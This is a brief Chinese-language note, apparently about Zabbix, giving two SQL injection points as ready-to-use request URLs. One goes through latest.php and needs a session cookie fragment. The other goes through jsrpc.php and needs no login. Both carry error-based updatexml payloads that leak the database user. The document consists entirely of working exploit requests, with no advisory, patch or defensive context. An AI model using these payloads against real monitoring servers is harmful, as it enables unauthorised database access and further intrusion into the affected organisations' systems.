注入点1
需要登录获取cooike后16位
/latest.php?output=ajax&sid=【cooike zbx——sessionid后16位】&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)
注入点2
jsrpc.php 无需登录
/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)